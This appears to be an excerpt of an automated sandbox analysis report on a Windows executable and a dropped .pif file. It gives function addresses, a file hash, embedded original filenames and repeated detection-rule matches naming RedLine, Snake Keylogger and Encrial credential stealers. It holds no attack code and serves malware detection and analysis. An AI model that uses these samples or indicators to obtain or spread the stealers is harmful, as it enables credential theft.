Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CF64F	5_2_2B5CF64F
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CF660	5_2_2B5CF660
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5C3EF8	5_2_2B5C3EF8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CEDB0	5_2_2B5CEDB0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5CEDA1	5_2_2B5CEDA1
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2B5C7CEF	5_2_2B5C7CEF
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C140040	5_2_2C140040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C143048	5_2_2C143048
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1454E0	5_2_2C1454E0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14E178	5_2_2C14E178
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1462BA	5_2_2C1462BA
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1406A0	5_2_2C1406A0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14D014	5_2_2C14D014
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14AC10	5_2_2C14AC10
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14D018	5_2_2C14D018
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14003E	5_2_2C14003E
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14AC20	5_2_2C14AC20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14D470	5_2_2C14D470
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14B078	5_2_2C14B078
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14D461	5_2_2C14D461
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14B068	5_2_2C14B068
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14D8BA	5_2_2C14D8BA
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14B4D0	5_2_2C14B4D0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14B4C1	5_2_2C14B4C1
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14D8C8	5_2_2C14D8C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14DD11	5_2_2C14DD11
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14B918	5_2_2C14B918
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14DD20	5_2_2C14DD20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14B928	5_2_2C14B928
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14E176	5_2_2C14E176
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14BD70	5_2_2C14BD70
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C148960	5_2_2C148960
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14BD80	5_2_2C14BD80
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C148DB8	5_2_2C148DB8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C148DA8	5_2_2C148DA8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14E5D0	5_2_2C14E5D0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14C1D8	5_2_2C14C1D8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14E5C1	5_2_2C14E5C1
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14C1C8	5_2_2C14C1C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C149210	5_2_2C149210
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14EA18	5_2_2C14EA18
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C149200	5_2_2C149200
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C141638	5_2_2C141638
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C141627	5_2_2C141627
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14EA28	5_2_2C14EA28
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14965A	5_2_2C14965A
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14EE70	5_2_2C14EE70
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C149668	5_2_2C149668
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C141A90	5_2_2C141A90
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C141A86	5_2_2C141A86
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14EE80	5_2_2C14EE80
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C149AB0	5_2_2C149AB0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C141ED8	5_2_2C141ED8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C149AC0	5_2_2C149AC0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C141EE8	5_2_2C141EE8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C149F18	5_2_2C149F18
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C149F0C	5_2_2C149F0C
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14233C	5_2_2C14233C
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14C757	5_2_2C14C757
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C142340	5_2_2C142340
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14A370	5_2_2C14A370
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14A360	5_2_2C14A360
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14C768	5_2_2C14C768
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C142796	5_2_2C142796
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C142798	5_2_2C142798
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14CBBE	5_2_2C14CBBE
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14A7B9	5_2_2C14A7B9
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1487D8	5_2_2C1487D8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14CBC0	5_2_2C14CBC0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C14A7C8	5_2_2C14A7C8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C142BF0	5_2_2C142BF0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C142BE0	5_2_2C142BE0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D2EB8	5_2_2C1D2EB8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D2850	5_2_2C1D2850
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D0B30	5_2_2C1D0B30
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D4040	5_2_2C1D4040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D21E8	5_2_2C1D21E8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D9CF0	5_2_2C1D9CF0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D1B80	5_2_2C1D1B80
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D9334	5_2_2C1D9334
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1DAC72	5_2_2C1DAC72
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D2EA8	5_2_2C1D2EA8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D8828	5_2_2C1D8828
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D8827	5_2_2C1D8827
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D2840	5_2_2C1D2840
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D0B20	5_2_2C1D0B20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D4030	5_2_2C1D4030
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D0040	5_2_2C1D0040
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D21D8	5_2_2C1D21D8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D1B71	5_2_2C1D1B71
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D3550	5_2_2C1D3550
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D354E	5_2_2C1D354E
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D92ED	5_2_2C1D92ED
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2C1D9328	5_2_2C1D9328
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2CBAB368	5_2_2CBAB368
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2CBA5CC8	5_2_2CBA5CC8
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2CBA4A60	5_2_2CBA4A60
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_2_2CBAC658	5_2_2CBAC658
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_00408C60	5_1_00408C60
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_0040DC11	5_1_0040DC11
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_00407C3F	5_1_00407C3F
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_00418CCC	5_1_00418CCC
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_00406CA0	5_1_00406CA0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_004028B0	5_1_004028B0
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_0041A4BE	5_1_0041A4BE
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_00418244	5_1_00418244
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_00401650	5_1_00401650
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_00402F20	5_1_00402F20
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_004193C4	5_1_004193C4
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_00418788	5_1_00418788
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_00402F89	5_1_00402F89
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_00402B90	5_1_00402B90
Source: C:\Users\user\Links\daphpvwO.pif	Code function: 5_1_004073A0	5_1_004073A0

Source: Joe Sandbox View

Dropped File: C:\Users\user\Links\daphpvwO.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: String function: 029D3E9C appears 45 times
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: String function: 029D3E20 appears 54 times
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: String function: 029C4414 appears 246 times
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: String function: 029C421C appears 64 times
Source: C:\Users\user\Desktop\ja811MqV4h.exe	Code function: String function: 029C457C appears 835 times
Source: C:\Users\user\Links\daphpvwO.pif	Code function: String function: 0040D606 appears 48 times
Source: C:\Users\user\Links\daphpvwO.pif	Code function: String function: 0040E1D8 appears 88 times

Source: ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F366000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F366000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000002.1360135559.00000000210C6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000003.1318064096.000000007F210000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000002.1360529443.000000002125E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000002.1359167957.0000000020796000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000002.1325858456.0000000000994000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000003.1318791565.00000000009EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000003.1318064096.000000007F256000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000003.1318064096.000000007F256000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000002.1359987570.0000000020F60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLOADER.EXEB vs ja811MqV4h.exe
Source: ja811MqV4h.exe, 00000000.00000003.1318791565.00000000009BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs ja811MqV4h.exe

Source: ja811MqV4h.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 5.1.daphpvwO.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.daphpvwO.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.daphpvwO.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.1.daphpvwO.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.3.daphpvwO.pif.268f6d60.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.2aec0000.9.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.1.daphpvwO.pif.438038.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.daphpvwO.pif.438038.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.ja811MqV4h.exe.212705a8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.298e6458.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.298e5570.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.28880ee8.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.daphpvwO.pif.2990e990.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
